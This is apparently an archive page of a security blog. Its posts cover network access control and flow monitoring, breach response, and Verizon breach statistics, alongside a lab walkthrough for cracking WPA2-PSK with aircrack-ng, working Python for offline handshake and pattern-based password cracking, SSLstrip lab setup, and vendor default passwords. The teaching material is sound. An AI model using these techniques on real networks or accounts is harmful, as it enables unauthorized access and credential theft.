Tag Archives: Stealth Watch

Post NAC: Cisco Identity Services Engine (ISE) and Lancope StealthWatch for Total Access Control

Controlling who and what accesses your network is a critical element of keeping your resources safe from malicious threats. Network Admission Control (NAC) solutions like the Cisco Identity Services Engine (ISE) can police who and what is permitted onto the network and enforce policy for those devices. Examples would be permitting an administrator with a government-furnished Windows 7 laptop access to VLAN 10, which holds internal servers, while provisioning a marketing professional’s iPad with VLAN 20 access, which is limited to Internet and email through the use of ACLs.

But what happens once a device is granted network access? At that point access control solutions are largely out of the picture, aside from limited profile monitoring that identifies changes in device type. (Examples of this limited functionality include working out that an “Apple Device” is really an “iPad” from DHCP and other traffic seen while the user browses the network, or blocking a user who spoofs a printer’s MAC address to gain network access.)


Example ISE policy for profiled Apple iPad or iPhone and User “Joey” to get Apple_Mobile Access 

Beyond this is where the handoff to an internal monitoring solution such as Lancope’s StealthWatch System should come into play. An internal monitoring solution picks up where the access control solution leaves off: it monitors all devices on the network for performance and suspicious behavior, regardless of whether or not they were approved by NAC. Examples of devices that NAC solutions may miss are virtual systems inside the data center, network sharing such as an iPhone turned into a wireless hotspot, consumer Linksys routers using NAT to hide unauthorized devices, and devices attached to a part of the network that has no access control.


An important function of a post-access-control solution is identifying devices compromised while on the network, since most access control solutions only verify policy at admission time (patch level, installed security applications such as antivirus, and so on). Compromise after admission happens when users surf the Internet, plug in a USB drive hosting malware, open an infected email, etc. In many cases the threats that compromise internal users are not common viruses, meaning there is no known signature that antivirus or firewall technologies can use to flag the attack. A post-access-control technology that uses behavior to identify threats can catch not only insider threats posed by authorized users, but also stealthy, externally launched threats that bypass the security measures a NAC policy typically enforces.

The integration of Cisco ISE for access control and Lancope’s StealthWatch for internal network monitoring saves customers money by leveraging the NetFlow data already produced by routers, switches and other network infrastructure devices, essentially turning the entire network into a giant sensor grid for detecting anomalous activity. Both Cisco and Lancope use industry standards supported by most vendors’ equipment (Cisco ISE uses 802.1X; Lancope uses NetFlow). Both companies also offer physical and virtual versions of all solution components, and both can be architected in a centralized or distributed design.
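To make the handoff concrete, here is an added example in Python (not code from the original post, and not how StealthWatch or ISE actually implement this) of the kind of correlation the combination enables: NetFlow-style records from a switch are joined against a NAC session table so that internal talkers ISE never authenticated stand out, and two simple behavioral checks (many distinct internal peers on one port, and bulk transfer to a single external host) are run over the same records. The flow records, the session table, the addresses and the thresholds are all constructed for the demonstration.

```python
"""Added example: correlate constructed NetFlow-style records with a NAC
(802.1X) session table. Not StealthWatch's or ISE's own logic; thresholds,
addresses and records below are constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")   # constructed internal range

@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: str
    bytes_out: int   # bytes sent from src to dst

# Constructed stand-in for what ISE knows about authenticated endpoints:
# IP -> (user, profiled device type).
NAC_SESSIONS = {
    "10.0.10.5": ("joey", "Windows7-Laptop"),
    "10.0.20.7": ("marketing1", "Apple-iPad"),
}

# Constructed NetFlow-style records exported by a distribution switch.
FLOWS = [
    Flow("10.0.10.5", "10.0.10.50", 445, "tcp", 18_000),
    Flow("10.0.20.7", "198.51.100.10", 443, "tcp", 4_000),
    # 10.0.30.9 never authenticated to NAC and is sweeping tcp/22 across a /24.
    *[Flow("10.0.30.9", f"10.0.10.{i}", 22, "tcp", 60) for i in range(1, 41)],
    # 10.0.10.5 is an authenticated user, yet pushes 700 MB to one external host.
    Flow("10.0.10.5", "203.0.113.77", 443, "tcp", 700 * 1024 * 1024),
]

SCAN_PEER_THRESHOLD = 25                  # distinct internal peers on one port
EGRESS_BYTES_THRESHOLD = 500 * 1024 * 1024

def unauthenticated_talkers(flows, sessions):
    """Internal sources present in flow data but absent from NAC: devices NAC never saw."""
    seen = {f.src for f in flows if ip_address(f.src) in INTERNAL}
    return sorted(seen - set(sessions))

def scan_suspects(flows, threshold=SCAN_PEER_THRESHOLD):
    """Sources that contacted many distinct internal hosts on the same destination port."""
    peers = defaultdict(set)
    for f in flows:
        if ip_address(f.dst) in INTERNAL:
            peers[(f.src, f.dport)].add(f.dst)
    return {src: (port, len(p)) for (src, port), p in peers.items() if len(p) >= threshold}

def egress_suspects(flows, threshold=EGRESS_BYTES_THRESHOLD):
    """Internal sources sending more than `threshold` bytes to a single external host."""
    totals = defaultdict(int)
    for f in flows:
        if ip_address(f.src) in INTERNAL and ip_address(f.dst) not in INTERNAL:
            totals[(f.src, f.dst)] += f.bytes_out
    return {k: v for k, v in totals.items() if v > threshold}

def report(flows=FLOWS, sessions=NAC_SESSIONS):
    """Attach the NAC identity (user, device profile) to every finding that has one."""
    def who(ip):
        return sessions.get(ip, ("<no NAC session>", "<unprofiled>"))
    findings = []
    for ip in unauthenticated_talkers(flows, sessions):
        findings.append(("unauthenticated-device", ip, who(ip)))
    for ip, (port, n) in scan_suspects(flows).items():
        findings.append(("internal-scan", ip, who(ip), f"{n} peers on tcp/{port}"))
    for (src, dst), total in egress_suspects(flows).items():
        findings.append(("bulk-egress", src, who(src), f"{total // 2**20} MB to {dst}"))
    return findings

if __name__ == "__main__":
    for line in report():
        print(*line)
```

The unauthenticated device is a finding purely because the flow data and the NAC session table disagree; neither tool alone sees that. The egress finding shows the other half of the argument: the user is fully authorized, so NAC has no reason to act, and only the behavior after admission reveals the problem.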


Here are the beneficial actions that can be taken by combining access control and internal monitoring:

  • Enforce policy on devices accessing the network.
  • Identify unauthorized devices not seen by NAC.
  • Monitor devices for threats and performance during their entire lifecycle on the network.
  • Know who and what is on the network, as well as what they are doing.
  • Automatically provision network access for trusted users and guests.
  • Identify threats on the internal network including malware, botnets and data loss.
  • Limit access for remediation of an identified threat.
  • Document a threat’s entire presence on the network for information assurance.

And here are the steps for setting up Cisco ISE and StealthWatch within a network:

  • Configuring On-Boarding via BYOD in ISE HERE
  • Setting up a Lancope StealthWatch small lab HERE

Click here for more information on how Cisco and Lancope work together to defend governments and enterprises against advanced threats.


Filed under Bring Your Own Device BYOD, Network Admission Control

Breaking WPA2-PSK with Kali Linux : wireless.

Great post by Aamir Lakhani on breaking WPA2-PSK. The original can be found HERE

WPA2-PSK may not be as safe as you think. There are a few attacks against WPA2-PSK; one of the most common is exploiting a weak passphrase.

Below you will find a few easy steps on how to break WPA2 with a weak passphrase.

Breaking the wireless Lab Home Network:

I set up a test network for this blog article. The client box is logging into my wireless Lab test network. This is the network we will break.


Step 1:

The first step is to verify the router configuration. Normally in a real penetration test we would not have this option, but since this is a home lab I have a little more flexibility.

In this case the lab access point is securing the wireless network Wireless Lab with WPA2-PSK. It is using the passphrase Cisco123. You can use any wireless router to set up your wireless lab.


 Step 2:

We will be using Kali Linux to complete this task. Kali will need a wireless card configured before it can be used by the operating system. I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter will work. I am a big fan of the AWUS051NH adapter because it is a dual-band adapter. However, this card is very difficult to obtain since it is no longer sold.


The iwconfig command will show any wireless cards in the system. I am using a Realtek wireless card. Linux ships with the Realtek drivers, making it a plug-and-play wireless card under Linux.

The operating system recognizes a wireless interface named wlan0.


Step 3:

My next step will be to enable the wireless interface. This is accomplished by issuing the ifconfig wlan0 up command.


Step 4:

I need to understand what wireless networks my wireless card sees. I issue the iwlist wlan0 scanning command.


This command forces the wireless card to scan and report on all wireless networks in the vicinity.

You can see from this example it found my target network: Wireless Lab. It also found the MAC address of my access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific access point (to ensure we are not attacking or breaking anyone else’s password).

Secondly, we see the AP is transmitting on channel 36. This is important because it lets us be specific about which wireless channel we want our card to monitor and capture traffic from.


Step 5:

The next step is to put the wireless card into monitor mode. This will allow the wireless card to examine all the packets in the air.

We do this by creating a monitor interface using airmon-ng. Issue the airmon-ng command to verify airmon-ng sees your wireless card. From that point create the monitor interface by issuing the command: airmon-ng start wlan0


Next, run the ifconfig command to verify the monitor interface was created; you should see mon0 listed alongside wlan0.

Step 6:

Use airodump-ng to capture the WPA2 handshake. The attacker has to catch a client in the act of authenticating to get a valid capture. airodump-ng displays a confirmation in the upper right-hand corner of the screen when it has captured a handshake.

Note: We will manually connect to the wireless network to force a handshake. In a future post I will show you how to force a reauthentication (a deauthentication attack) so a device disconnects and reconnects automatically without any manual intervention.

We used the following command, where --bssid limits the capture to our AP, --channel stops the card from channel hopping and --write names the capture file we will save to:

airodump-ng mon0 --bssid 0E:18:1A:36:D6:22 --channel 36 --write BreakingWPA2

(each option takes two dashes with no space between them)


To capture the handshake you depend on observing a legitimate client authenticate to the network. That does not mean you have to wait for a client to authenticate on its own: you can force a client to re-authenticate, which happens automatically with most clients when you send a deauthentication.

When you see the WPA handshake message, you know you have captured a valid handshake.

example:


Step 7:

We will use aircrack-ng with a dictionary file to crack the password. Your chances of breaking the password depend on the quality of the wordlist.


The command is: aircrack-ng <name of the .cap file you created> -w <name of your dictionary file>. In our case:

aircrack-ng BreakingWPA2-01.cap -w sample.lst

The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2 handshake airodump captured is stored in the BreakingWPA2-01.cap file.

BackTrack 5 ships with a basic dictionary. The dictionary file darkc0de.lst is a popular wordlist that ships with BackTrack 5. We added our password Cisco123 to this file to make the test run a little smoother.

Many attackers use large dictionaries to increase their chances of cracking a password. Many dictionaries contain passwords from real users and websites that have been cracked and posted on the Internet. Some sophisticated dictionaries combine multiple languages, permutations of each word, and key words and phrases from social media sites such as Twitter and Facebook.

Kali does not come with darkc0de.lst, but you can download it from here.

In this blog we created a file named “sample.lst” and added the word Cisco123 in it.

Success:

If the passphrase is in the dictionary file, aircrack-ng will crack it.
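Why a weak passphrase is enough, and what the captured handshake actually gives the attacker, is worth seeing in code. The Python below is an added example (it is not from the original post and is not aircrack-ng’s source) that reproduces the arithmetic step 7 performs: derive the PMK from each candidate passphrase with PBKDF2 over the SSID, expand it into the PTK using both MAC addresses and both nonces from the handshake, and check whether the first 16 bytes of the PTK (the KCK) reproduce the MIC on the captured EAPOL frame. The handshake is constructed in the script from the lab passphrase Cisco123 and SSID Wireless Lab; the client MAC, the nonces and the EAPOL body are made-up values, not bytes from the post’s capture.

```python
"""Added example: offline WPA2-PSK dictionary attack against a 4-way handshake.
Not aircrack-ng's code. Everything except the BSSID and SSID from the post is
constructed here so the script runs without a capture file."""
import hashlib
import hmac
from typing import Iterable, Optional

SSID = b"Wireless Lab"
AP_MAC = bytes.fromhex("0e181a36d622")        # BSSID seen in the post's scan
STA_MAC = bytes.fromhex("00c0ca123456")       # constructed client MAC
ANONCE = hashlib.sha256(b"anonce").digest()   # constructed 32-byte nonces
SNONCE = hashlib.sha256(b"snonce").digest()

# Constructed EAPOL-Key message 2 with the MIC field zeroed. In a real frame the
# MIC sits at offset 81 (4-byte EAPOL header + 77 bytes of key descriptor).
EAPOL_MIC_OFFSET = 81
EAPOL_NO_MIC = bytes(range(EAPOL_MIC_OFFSET)) + bytes(16) + b"\x00\x00"

def pmk_from_passphrase(passphrase: str, ssid: bytes = SSID) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the only secret input."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]

def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK expansion; every input except pmk is visible in the captured handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, eapol_no_mic: bytes) -> bytes:
    """WPA2 (AES key descriptor): MIC is HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_no_mic, hashlib.sha1).digest()[:16]

def mic_for(passphrase: str) -> bytes:
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_NO_MIC)

# What the "WPA handshake" capture hands the attacker: the MIC the real client sent.
CAPTURED_MIC = mic_for("Cisco123")

def crack(captured_mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute the MIC for each candidate; a match reveals the pre-shared key."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if candidate and hmac.compare_digest(mic_for(candidate), captured_mic):
            return candidate
    return None

if __name__ == "__main__":
    # Constructed stand-in for the sample.lst used in the post.
    print(crack(CAPTURED_MIC, ["password", "linksys", "cisco123", "Cisco123"]))
```

The 4096 PBKDF2 rounds are the only thing slowing the attacker down, and they are per candidate, not per handshake: once the handshake is captured the attack is entirely offline, which is why the passphrase (and the size of the wordlist) decides the outcome. Note that the PMK depends on the SSID, so rainbow tables only help against common network names.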



Filed under General Security

SSL Strip – Breaking Secure Websites

Aamir Lakhani wrote an overview of how to perform an SSL strip attack. The original post can be found HERE

SSLSTRIP LAB

Before beginning the lab, make sure you have the BackTrack 5 R3 VM imported into VMware Player/Workstation/Server/Fusion, or whatever virtual machine environment you have chosen to use.

The following is an excerpt from the VMware Player 4.0 user guide, “Getting Started with VMware Player”.

Import an Open Virtualization Format Virtual Machine

You can import an Open Virtualization Format (OVF) virtual machine and run it in Player. Player converts the virtual machine from OVF format to VMware runtime (.vmx) format. You can import both .ovf and .ova files.

OVF is a platform-independent, efficient, extensible, and open packaging and distribution format for virtual machines. For example, you can import OVF virtual machines exported from VMware Fusion into Player. You can import OVF 1.0 and later files only.

You can also use the standalone OVF Tool to convert an OVF virtual machine to VMware runtime format. The standalone version of the OVF Tool is installed in the Player installation directory under OVFTool. See the OVF Tool User Guide on the VMware Web site for information on using the OVF Tool.

Procedure

  1. In Player, select File > Open a Virtual Machine.
  2. Browse to the .ovf or .ova file and click Open.
  3. Type a name for the virtual machine, type or browse to the directory for the virtual machine files, and click Import. Player performs OVF specification conformance and virtual hardware compliance checks. A status bar indicates the progress of the import process.
  4. If the import fails, click Retry to try again, or click Cancel to cancel the import.

If you retry the import, Player relaxes the OVF specification conformance and virtual hardware compliance checks and you might not be able to use the virtual machine in Player.

After Player successfully imports the OVF virtual machine, the virtual machine appears in the virtual machine library.

Your Lab

In this lab we are using virtual-machine-based attack hosts. The hosts run BackTrack 5 R3 (based on Ubuntu Linux). The reason for using BackTrack is that all of the modules and their dependencies for this lab are preloaded in the distribution. The dependencies for SSLStrip are (already loaded in BackTrack):

  • Python >= 2.5 (apt-get install python)
  • The python “twisted-web” module (apt-get install python-twisted-web)

Additionally, to use SSLStrip you need (again, already in BackTrack):

  • arpspoof or Ettercap (this lab uses arpspoof; Ettercap has issues with wireless)
  • ipchains / iptables
  • netstat

Additionally, when using BackTrack or any Ubuntu-based distribution, it is a good idea to run APT to update the existing packages. BackTrack has several custom repositories preconfigured.

# Use this command to update:
apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Getting Started 

Once your Backtrack virtual machine is installed and booted use the following credentials to log in:

Username: root
Password: toor

Start the desktop environment by issuing the startx command from the terminal session:


Note: It is not mandatory to use a GUI desktop, but for the purposes of this lab it is recommended. Those less familiar with working in a Linux shell will find it simpler to switch between the multiple terminal windows needed for the upcoming operations.

You should now see an environment similar to the following:


For the purposes of this lab we will only be using a single interface, but your virtual machine might be configured with multiple Ethernet interfaces, so we need to check whether more than one (virtual) Ethernet interface is enabled.

In the upper left hand corner of the desktop click on the Xterm link.


When you see a terminal window open on the desktop, you are ready to continue.

  1. Use ifconfig to determine what interfaces are on the virtual machine.

ifconfig | grep eth

This command filters out everything else and shows just the Ethernet interfaces, like below.


If we do indeed have more than one interface enabled, issue the ifdown command with the interface name to disable it. If there is an interface named eth1, as shown above, issue the command:

ifdown eth1

The output should be like what is shown below.



Filed under General Security

How Hackers Crack Weak Passwords

People use weak password practices to secure critical information. Weak practices include using the same password for multiple systems regardless of the value of the asset, using dictionary words or short phrases, and keeping the same password for extended periods of time. For example, it is common to find that the password on a non-critical asset such as a PlayStation 3 is the same as the person’s bank account login.

The more an attacker knows about your password profile, the more likely they are to crack your password. For example, a policy of “6–10 characters with one upper-case letter and one special character” tells the attacker which candidates to skip and so shrinks the space they have to search, meaning passwords are weaker under the policy than the policy suggests. If a hacker captures a password for another system and notices a formula such as ‘<dictionary word>’ followed by ‘<3 numbers>’, it helps the attacker prepare a targeted dictionary attack (utilities such as Crunch make this easy). Any password shorter than 10 characters is an easy target for a brute-force attack given today’s processing power.

Here are some tools that hackers can use to crack your passwords.


John the Ripper is an old-school yet powerful password cracking utility. It has several engines that handle different password and hash formats, auto-detects most common hash types, and hashes candidate passwords from wordlists and mangling rules to compare against the targets. Attackers like John the Ripper because it is very customizable.

John the Ripper cracked 3 passwords from a Linux shadow file.


Hashcat is a password cracking utility. It is multi-threaded and can work through multiple hashes and password lists in a single attack session. Hashcat offers many attack modes: brute-force, combinator, dictionary, hybrid, mask and rule-based attacks.


Hashcat GUI

Ophcrack

Ophcrack is a Windows password cracker based on rainbow tables (precomputed tables of hashes). Ophcrack can import hashes from a variety of formats, including dumping them directly from a Windows SAM file.


Ophcrack Cracking Hashes

Findmyhash

Findmyhash is a Python script that uses free online services to crack hashes. It submits the hash to multiple websites that hold rainbow tables or precomputed lookups and reports any match.

Findmyhash running an MD5 hash against multiple websites

Crunch

Crunch is a tool for generating password lists. This is extremely helpful if you are able to gather intelligence on how your target creates passwords. For example, if you capture two passwords and notice the target uses a phrase followed by random digits, Crunch can quickly generate a list of that phrase followed by every possible digit combination. A perfect tool for defeating company password policies!

Creating a password list for the word “pass” followed by any two numbers


Crunch output. List of all combinations of “pass” and two numbers
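The point of Crunch and of the ‘<dictionary word> followed by <3 numbers>’ observation above is that a known pattern collapses the search space. The Python below is an added example (not Crunch’s code and not from the original post) of a small pattern-driven generator modelled on Crunch’s -t placeholders, together with the keyspace arithmetic and a dictionary check against a couple of hashes. The placeholder alphabet, the seed words and the target hashes (plain SHA-256 of passwords that follow the observed formula) are all constructed for the demonstration.

```python
"""Added example: pattern-driven candidate generation in the spirit of `crunch -t`,
with keyspace counts and a check against constructed unsalted SHA-256 targets.
Not Crunch's code; placeholders, words and targets are constructed here."""
import hashlib
import itertools
import string
from typing import Iterable, Iterator, Optional

# Placeholder alphabet modelled on crunch -t: @ lowercase, , uppercase, % digit, ^ symbol.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_=+",
}

def pattern_candidates(pattern: str) -> Iterator[str]:
    """Expand a pattern like 'pass%%' into every concrete string it matches."""
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]   # literal chars are 1-element slots
    for combo in itertools.product(*slots):
        yield "".join(combo)

def keyspace(pattern: str) -> int:
    """How many candidates the pattern expands to, without generating them."""
    n = 1
    for ch in pattern:
        n *= len(PLACEHOLDERS.get(ch, ch))
    return n

def word_plus_digits(words: Iterable[str], digits: int) -> Iterator[str]:
    """The '<dictionary word> followed by <N numbers>' formula from the text."""
    for w in words:
        yield from pattern_candidates(w + "%" * digits)

def crack_sha256(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Unsalted SHA-256 stands in for whatever format the leaked hash used."""
    for c in candidates:
        if hashlib.sha256(c.encode()).hexdigest() == target_hex:
            return c
    return None

# Constructed targets: hashes of passwords that follow the observed formulas.
TARGET_PASS42 = hashlib.sha256(b"pass42").hexdigest()
TARGET_SUMMER = hashlib.sha256(b"Summer123").hexdigest()
SEED_WORDS = ["Winter", "Spring", "Summer", "Autumn"]   # constructed seed list

if __name__ == "__main__":
    print(keyspace("pass%%"), "candidates for 'pass' + two digits")
    print(crack_sha256(TARGET_PASS42, pattern_candidates("pass%%")))
    print(len(SEED_WORDS) * keyspace("%%%"), "candidates for 'season + 3 digits'")
    print(crack_sha256(TARGET_SUMMER, word_plus_digits(SEED_WORDS, 3)))
    # Same 9-character length with no pattern knowledge, lowercase only:
    print(keyspace("@" * 9), "candidates without the formula")
```

Four seed words and three digits is 4,000 candidates; nine unknown lowercase letters is over five trillion. That ratio, not the hash algorithm, is what the Crunch screenshots above are exploiting.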

Chntpw

An alternative to breaking a Windows password is bypassing it completely. Chntpw is a utility that can reset or remove a Windows password. This gives a hacker with offline access to the Windows SAM file (for example, by booting the machine from other media) the ability to obtain administrator privileges.

Chntpw options. Option 1 clears the password.

There are many tools available to break weak passwords. Best practice is a password longer than 10 characters (even a repeated character at the end helps), no dictionary words, periodic changes, different passwords for sensitive and non-sensitive sites, and not using a computer that accesses sensitive data for personal use (i.e. the same system for Facebook and for configuring routers). I suggest using the first letter of each word of a long sentence, so you can remember the password while the output looks random. Hope this helps. All tools shown are free and available on BackTrack / Kali.


Filed under General Security, Penetration / Hacking

Verizon’s 2013 Data Breach Investigations Report

Verizon recently released their annual Data Breach Investigations Report (download HERE). This report is based on statistics from 19 contributing organizations and covers 621 confirmed breaches and more than 47,000 security incidents, with the goal of educating the public about current cyber threats. All results are built from first-hand evidence collected during paid external forensic investigations and related intelligence operations conducted by Verizon from 2004 through 2012.

There are a lot of interesting findings, ranging from the most common attacks to the most popular targets. According to the report, everybody is a target: “from pubs to public agencies, mom-and-pops to multi-nationals, nobody was immune”. Some attacks, such as phishing, had success rates as high as 95%, meaning “most attackers would be able to slap a ‘guaranteed’ sticker on getting a click”. They even call out that most organizations should assume they are already compromised.

To break things down, here are some highlights:

  • Who are the targets? – Everybody.
  • Who is perpetrating breaches? The majority of breaches are by outsiders (92%); however, insider involvement is on the rise (14%).
  • How do breaches occur? 76% exploited weak or stolen credentials, followed by hacking (52%) and malware (40%).
  • How sophisticated are the attacks? On a scale from High to Very Low, the majority of initial breaches used Low-difficulty attacks. I like how they put it: “Would you fire a guided missile at an unlocked screen door?”
  • Who are the criminals? Organized crime made up the majority of external attacks (over 50%) while other groups fell around 20% or less.
  • The leader for espionage was China, while Romania, followed by the USA, led for financial crimes. Spyware (including keyloggers) is the common method for financial crimes, while multiple forms of malware are typical for espionage.
  • Social engineering dipped over the last two years but is up again in the 2012 data (29%).
  • Installing malware on compromised systems is still the most common vector.
  • ATM hacking topped the list for physical crimes. I wonder if this was triggered by Barnaby Jack’s Black Hat ATM demonstration.
  • Two-thirds of the data compromised was data at rest, on an asset like a database or file server. One-third was compromised while being processed, via RAM scrapers, skimmers and keyloggers. No data was compromised in transit (i.e. by compromising a backbone router).


The Verizon report is another confirmation that cyber threats are very real and probably active inside your network. The report calls out that the most common attacks are easy to execute and have very high success rates (such as phishing campaigns). Standard signature-based security products will not catch many of the threats called out in this report. The best way to identify them is to monitor behavior inside the network and to build your security strategy in layers.


Filed under General Security

5 Steps to Take Right After Suffering a Cyber Security Breach

Thanks to my guest writer Kyle Olson for this post. Kyle’s bio is below.


Security breaches of your web hosting servers and any other server-based online assets are no laughing matter. Suffering one can mean anything from the theft of data for fraud to the destructive erasure of all your information just for the fun of it (hackers aren’t exactly known for always being motivated by money).

Whatever the case may be, you, as the hard-working owner of a site you spent months or years building, get the dubious pleasure of watching everything you built come crashing down in less time than it takes to have lunch. This is not something you want, especially since it can be avoided through some fairly straightforward security procedures.

Anyhow, what’s done is done: you’ve been hacked, and the only thing left to do is save what you can. Let’s cover how you can do that in 5 essential and effective steps.

1. Don’t Panic, Be Methodical

This is the first and most basic thing you need to do; calm down and proceed methodically. Yes, a hack is a severe thing that needs to be dealt with quickly, but running around like a headless chicken won’t solve anything. If you calmly assess the situation, go through the possibilities and the steps we’re about to cover, you’ll have a much better chance of successfully countering any damaging effects than if you work randomly or just freeze up, waiting for the situation to improve on its own.

2. Check in With Your Hosting Provider

Contact your hosting provider as soon as you notice that your site is down, redirecting to suspicious third-party sites, or showing unmistakable signs of serious malfunction. Do the same if you can’t access key parts of your back end, such as servers, cPanel or the CMS login. For one thing, your hosting provider has the tools and expertise to help you resolve the hack or save your data; secondly, they can help you uncover vital information about it, such as how many people it is affecting and how it might have occurred.

3. Make a Record of Everything and Save All Suspicious data

As soon as you notice something wrong with your servers or site, start noting things down. Record everything you saw and experienced and the times at which you saw it. Additionally, save copies of any malicious or suspicious code, files and process listings. Even if you need to destroy them as part of your damage control, first save all such data to a separate medium such as a USB drive. When possible, this also means taking a full image of the entire drive or server.

Just as at a police crime scene, a record of events and a chain of evidence will help you more clearly understand, and possibly trace, the source of your hack.

4. Shut Your Site and FTP off then Start Backing Up Your Data

Back up everything on your servers and all associated files to a remote storage medium. Don’t worry if some of it is still contaminated with malicious code; you can scan it and clean out everything abnormal later. For now the key thing is to save as much of your site data as quickly as possible.

Before you start the backup, disconnect your site from all remote access. This may mean taking it offline and cutting off access to all FTP accounts. Afterwards, change all of your server and site access passwords, in the FTP profiles and elsewhere.

5. Download Everything Again

Once you have performed a thorough backup of all your data, cut your site off from outside access, changed all your access passwords and stopped as much malicious activity as possible, download fresh copies of any third-party applications that were supporting your site on the server. These may include the LAMP stack (Linux, Apache, MySQL, PHP), plugins like Java and Adobe Flash, or a CMS bundle like WordPress.

Having downloaded the newest, cleanest copies of all these applications to your newly secured server, you can start reinstalling the salvageable data backed up from the site before it was hacked.

When all else fails, you can always contact a company that will perform digital forensics tests to determine the cause of the incident.

About the author: Kyle Olson has written for the tech industry for over 10 years and has operated his own small business in the industry. When he’s not writing poignant articles, you can find him covering civil engineers in Boston or working on his forthcoming novel.


Filed under Internet Defense, Security Management & Analysis

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security Audit

The terms Penetration Test, Vulnerability Assessment and Security Audit are often blended together when requested by clients or offered by security service providers. All three have security aspects, but they are very different in the purpose they serve and in the expected deliverable.


A Security Audit typically means evaluating a system’s or application’s risk level against a set of standards or baselines. Standards are mandatory rules; baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies and processes.

Most requests for Security Audits are focused on passing an official audit (i.e. preparing for a corporate or government audit) or proving that the baseline requirements of a mandatory regulation (HIPAA, PCI, etc.) are met. In many cases Security Audit services include no assurance that a subsequent official audit will succeed; the service only provides information the client can use to become compliant.

IMPORTANT: In many cases security audits give customers a false sense of security. Most standards and baselines have a long update process that cannot keep up with the rapid changes in today’s threats. It is highly recommended to go beyond standards and baselines and raise security to a level that protects against real-world threats.

A Vulnerability Assessment is the process in which network devices, operating systems and application software are scanned to identify the presence of known vulnerabilities and misconfigurations. A vulnerability is a gap, error or weakness in how a system is designed, used or protected. When exploited, it can give unauthorized access, escalate privileges or deny service to the asset.

Vulnerability Assessments typically stop once a vulnerability is found, meaning the service does not include executing an attack against it to verify that it is real. The deliverable lists the potential risk associated with each vulnerability found, along with possible remediation steps. Many tools can scan for vulnerabilities based on system type, operating system, open ports and other characteristics. Vulnerability Assessments are a valuable way to assess a network for potential weaknesses and identify where to invest in future security.

A Penetration Test attempts to attack vulnerabilities in a similar manner to a real malicious attacker. Typically, penetration services are requested when an organization has exhausted its security investments and wants to verify that all avenues have been covered. The key difference between a Penetration Test and a Vulnerability Assessment is that a penetration test acts on the vulnerabilities found and verifies which are legitimate, reducing the list to the confirmed risks associated with a target.

IMPORTANT: One popular misconception is that a Penetration Testing service enhances IT security because it costs more than other security services. Penetration Testing does not make IT networks more secure, since the service evaluates existing security! A customer should not consider a penetration test if there is a belief that the target is not completely secure.

Hopefully these definitions help define future security service requests.

Filed under General Security

Installing Lancope StealthWatch on a Mac mini for Small Lab

Lancope enables visibility for security and network performance. Its security capabilities focus on identifying insider threats such as botnets, malware and data loss using non-signature, network-wide correlation of all traffic. Pretty much anything touching the physical or virtual network leaves a footprint, known as NetFlow, that is investigated for malicious intent and performance statistics.

Lancope offers virtual and physical appliance options for the StealthWatch technology, making it easy to build a lab. This post explains how to build a simple Lancope lab integrated with Cisco ISE 1.2 beta, using an Apple Mac mini server hosting vSphere ESXi 5.1 and an ASA 5505 firewall.

It’s important to understand the components of the Lancope StealthWatch System.

  • StealthWatch Management Console (SMC) – This is the centralized system that manages all other components. Administrators access this system’s IP for GUI management.
  • StealthWatch Collector – This collects NetFlow. All devices generating NetFlow send their data to this device for correlation.
  • StealthWatch Sensor – This generates NetFlow on behalf of devices that cannot send NetFlow themselves. It can also inspect application-layer data, providing additional context.
  • StealthWatch Identity Box OR Cisco ISE – These identify users and devices based on authentication and profiling. IP addresses are linked to user information.
  • StealthWatch Replicator – This replicates UDP management data such as flow data, SNMP traps and syslog.
  • StealthWatch SLIC – This is a reputation feed that correlates externally known threats with possible insider threats.

My lab uses virtualized appliances for all Lancope technology components. You can obtain Lancope .OVA files preloaded on Cisco 3850 switches, from Lancope’s website or from a solution provider. The first step is loading the Lancope .OVAs into vSphere. All appliances ask for basic IP, DNS and NTP information upon launching. The default login for everything is either admin or root with lan1cope or lan411cope. I had some problems with the default logins and recommend accessing the administration of each Lancope appliance from the command line, typing SystemConfig and resetting the passwords prior to logging into the GUI.

[Screenshot: SystemConfig found in the appliance command line]

[Screenshot: Lancope SMC ESXi properties]

The Lancope SMC requires a minimum of 8 GB of memory and 2 CPUs. Setup consists of basic IP configuration and then accessing its GUI via HTTPS. Additional system configuration can be done by clicking Administer this server, or the user GUI can be opened by clicking Start. One important first step in the GUI is adding the main inside network subnet to the Catch All.

[Screenshot: Adding the inside network to the Lancope Catch All]

[Screenshot: Lancope Collector ESXi properties]

